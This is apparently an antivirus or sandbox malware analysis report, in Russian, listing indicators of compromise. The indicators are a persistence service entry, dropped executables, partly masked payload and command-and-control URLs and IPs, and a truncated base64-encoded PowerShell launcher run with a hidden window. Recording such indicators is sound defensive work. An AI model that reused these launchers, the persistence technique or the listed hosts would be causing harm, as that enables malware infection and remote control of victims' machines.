Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\KBDYCL] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDYCL] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsModels0011\KBDYCL.exe"'
- 'KBDYCL' "%WINDIR%\SysWOW64\NlsModels0011\KBDYCL.exe"
- 'KBDYCL' %WINDIR%\SysWOW64\NlsModels0011\KBDYCL.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFIAQgBGAEcAYQBtAG0APQAnAE8ARABNAEsAWQBzAHcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AHIAYABJAGAAVABZAFAAYABSAG8AdABPAGAAQwBPAEwAIgAgAD...
- %HOMEPATH%\309.exe
- %HOMEPATH%\309.exe в %WINDIR%\syswow64\nlsmodels0011\kbdycl.exe
- '21#.#56.133.218':80
- '81.##.93.134':80
- http://kr#####urtransfer.com/QStk/
- http://le######riephotography.com/wp-admin/wQA0hhqk1b394/
- http://18#.##.148.68:443/bfRg4Af8qBfzs/o1hiyoD1Kh9h/MqAknkcwHK0/18xZR/6MDVqGy/Apm03/ via 18#.#6.148.68
- http://37.##.131.107/CNofPS3qEZEsfN/3OCuA7gTgHaQ/xMcxMXH2zFvi8I/lOBGIET2uFP/3Q45scN2VXYlVVxst0j/
- DNS ASK kr#####urtransfer.com
- DNS ASK le######riephotography.com
- '%HOMEPATH%\309.exe'
- '%WINDIR%\syswow64\nlsmodels0011\kbdycl.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFIAQgBGAEcAYQBtAG0APQAnAE8ARABNAEsAWQBzAHcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AHIAYABJAGAAVABZAFAAYABSAG8AdABPAGAAQwBPAEwAIgAgAD...' (со скрытым окном)